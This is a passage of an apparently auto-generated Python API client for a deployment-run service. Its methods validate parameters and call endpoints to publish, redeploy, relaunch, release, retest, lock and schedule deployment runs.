# verify the required parameter 'deploymentrunhostid' is set
if self.api_client.client_side_validation and ('deploymentrunhostid' not in local_var_params or # noqa: E501
local_var_params['deploymentrunhostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `deploymentrunhostid` when calling `perform_host_action`") # noqa: E501
# verify the required parameter 'action' is set
if self.api_client.client_side_validation and ('action' not in local_var_params or # noqa: E501
local_var_params['action'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `action` when calling `perform_host_action`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'deploymentrunhostid' in local_var_params and local_var_params['deploymentrunhostid'] is not None: # noqa: E501
query_params.append(('deploymentrunhostid', local_var_params['deploymentrunhostid'])) # noqa: E501
if 'action' in local_var_params and local_var_params['action'] is not None: # noqa: E501
query_params.append(('action', local_var_params['action'])) # noqa: E501
if 'cpu' in local_var_params and local_var_params['cpu'] is not None: # noqa: E501
query_params.append(('cpu', local_var_params['cpu'])) # noqa: E501
if 'ram' in local_var_params and local_var_params['ram'] is not None: # noqa: E501
query_params.append(('ram', local_var_params['ram'])) # noqa: E501
if 'instance_type_name' in local_var_params and local_var_params['instance_type_name'] is not None: # noqa: E501
query_params.append(('instanceTypeName', local_var_params['instance_type_name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/hostaction', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def publish_deployment_run(self, id, **kwargs): # noqa: E501
"""Publish Deployment Run # noqa: E501
Publishes the specified Deployment as a Composition.<br> <br> Consumers will be able to connect to the run, but will not be able to manage the composition. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.publish_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.publish_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def publish_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Publish Deployment Run # noqa: E501
Publishes the specified Deployment as a Composition.<br> <br> Consumers will be able to connect to the run, but will not be able to manage the composition. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.publish_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method publish_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `publish_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/publish', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def redeploy_container_asset(self, id, hostid, installationid, **kwargs): # noqa: E501
"""Re-deploy Container Asset # noqa: E501
Re-deploys the specified Container Asset installation on the single Host in the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.redeploy_container_asset(id, hostid, installationid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param str installationid: ID of container asset installation (required)
:param InputContainerComponent input_container_component: The updated Container Component definition
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.redeploy_container_asset_with_http_info(id, hostid, installationid, **kwargs) # noqa: E501
def redeploy_container_asset_with_http_info(self, id, hostid, installationid, **kwargs): # noqa: E501
"""Re-deploy Container Asset # noqa: E501
Re-deploys the specified Container Asset installation on the single Host in the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.redeploy_container_asset_with_http_info(id, hostid, installationid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param str hostid: ID of host (required)
:param str installationid: ID of container asset installation (required)
:param InputContainerComponent input_container_component: The updated Container Component definition
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'hostid', 'installationid', 'input_container_component'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method redeploy_container_asset" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `redeploy_container_asset`") # noqa: E501
# verify the required parameter 'hostid' is set
if self.api_client.client_side_validation and ('hostid' not in local_var_params or # noqa: E501
local_var_params['hostid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `hostid` when calling `redeploy_container_asset`") # noqa: E501
# verify the required parameter 'installationid' is set
if self.api_client.client_side_validation and ('installationid' not in local_var_params or # noqa: E501
local_var_params['installationid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `installationid` when calling `redeploy_container_asset`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'hostid' in local_var_params:
path_params['hostid'] = local_var_params['hostid'] # noqa: E501
query_params = []
if 'installationid' in local_var_params and local_var_params['installationid'] is not None: # noqa: E501
query_params.append(('installationid', local_var_params['installationid'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_container_component' in local_var_params:
body_params = local_var_params['input_container_component']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/host/{hostid}/container', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def redeploy_deployment_run_hosts(self, id, **kwargs): # noqa: E501
"""Redeploy Deployment Run Hosts # noqa: E501
Requests the redeploy of one or more deployment run hosts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.redeploy_deployment_run_hosts(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param list[RestIdObject] rest_id_object: The collection of deployment run host ids to redeploy
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.redeploy_deployment_run_hosts_with_http_info(id, **kwargs) # noqa: E501
def redeploy_deployment_run_hosts_with_http_info(self, id, **kwargs): # noqa: E501
"""Redeploy Deployment Run Hosts # noqa: E501
Requests the redeploy of one or more deployment run hosts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.redeploy_deployment_run_hosts_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param list[RestIdObject] rest_id_object: The collection of deployment run host ids to redeploy
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'rest_id_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method redeploy_deployment_run_hosts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `redeploy_deployment_run_hosts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'rest_id_object' in local_var_params:
body_params = local_var_params['rest_id_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/redeployhosts', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def relaunch_deployment_run(self, id, **kwargs): # noqa: E501
"""Relaunch Deployment Run # noqa: E501
Launches a new Deployment Run with the same configuration as the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.relaunch_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.relaunch_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def relaunch_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Relaunch Deployment Run # noqa: E501
Launches a new Deployment Run with the same configuration as the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.relaunch_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(str, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method relaunch_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `relaunch_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/rerun', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def release_deployment_run(self, id, **kwargs): # noqa: E501
"""Release Deployment Run # noqa: E501
Releases the Deployment Run for the ID provided.<br> <br> If the user is an Administrator, the force flag is honored.<br> <br> If the user is a non-Admin, the force flag is only honored in the event that a release request experiences an exception known to be resolved by a force. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.release_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool force: Force the release of this run
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.release_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def release_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Release Deployment Run # noqa: E501
Releases the Deployment Run for the ID provided.<br> <br> If the user is an Administrator, the force flag is honored.<br> <br> If the user is a non-Admin, the force flag is only honored in the event that a release request experiences an exception known to be resolved by a force. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.release_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool force: Force the release of this run
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'force'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method release_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `release_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'force' in local_var_params and local_var_params['force'] is not None: # noqa: E501
query_params.append(('force', local_var_params['force'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/release', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_category_from_deployment_run(self, id, runid, **kwargs): # noqa: E501
"""Unassign Category from deployment run # noqa: E501
Removes the Category as a filter tag from the provided Run.<br> <br> Altering the Category will affect future run filtering. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_category_from_deployment_run(id, runid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of category (required)
:param str runid: ID of run to unassign (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.remove_category_from_deployment_run_with_http_info(id, runid, **kwargs) # noqa: E501
def remove_category_from_deployment_run_with_http_info(self, id, runid, **kwargs): # noqa: E501
"""Unassign Category from deployment run # noqa: E501
Removes the Category as a filter tag from the provided Run.<br> <br> Altering the Category will affect future run filtering. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_category_from_deployment_run_with_http_info(id, runid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of category (required)
:param str runid: ID of run to unassign (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'runid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_category_from_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `remove_category_from_deployment_run`") # noqa: E501
# verify the required parameter 'runid' is set
if self.api_client.client_side_validation and ('runid' not in local_var_params or # noqa: E501
local_var_params['runid'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `runid` when calling `remove_category_from_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'runid' in local_var_params and local_var_params['runid'] is not None: # noqa: E501
query_params.append(('runid', local_var_params['runid'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/categories/{id}/run', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def retest_deployment_run(self, id, **kwargs): # noqa: E501
"""Re-test Deployment Run # noqa: E501
Re-executes all Tests in the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retest_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.retest_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def retest_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Re-test Deployment Run # noqa: E501
Re-executes all Tests in the specified Deployment Run. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.retest_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method retest_deployment_run" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `retest_deployment_run`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/retest', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def set_deployment_run_lock(self, id, lock, **kwargs): # noqa: E501
"""Update Lock # noqa: E501
Update the Lock on a single Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_deployment_run_lock(id, lock, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool lock: The desired lock state (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_deployment_run_lock_with_http_info(id, lock, **kwargs) # noqa: E501
def set_deployment_run_lock_with_http_info(self, id, lock, **kwargs): # noqa: E501
"""Update Lock # noqa: E501
Update the Lock on a single Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_deployment_run_lock_with_http_info(id, lock, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param bool lock: The desired lock state (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'lock'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method set_deployment_run_lock" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `set_deployment_run_lock`") # noqa: E501
# verify the required parameter 'lock' is set
if self.api_client.client_side_validation and ('lock' not in local_var_params or # noqa: E501
local_var_params['lock'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `lock` when calling `set_deployment_run_lock`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'lock' in local_var_params and local_var_params['lock'] is not None: # noqa: E501
query_params.append(('lock', local_var_params['lock'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/drs/{id}/setlock', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def set_power_schedule_for_deployment_run(self, id, **kwargs): # noqa: E501
"""Update Power Schedule # noqa: E501
Updates the Power Schedule for a single Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_power_schedule_for_deployment_run(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param PowerSchedule power_schedule: The desired power schedule
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.set_power_schedule_for_deployment_run_with_http_info(id, **kwargs) # noqa: E501
def set_power_schedule_for_deployment_run_with_http_info(self, id, **kwargs): # noqa: E501
"""Update Power Schedule # noqa: E501
Updates the Power Schedule for a single Deployment Run with the given ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_power_schedule_for_deployment_run_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: ID of deployment run (required)
:param PowerSchedule power_schedule: The desired power schedule
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
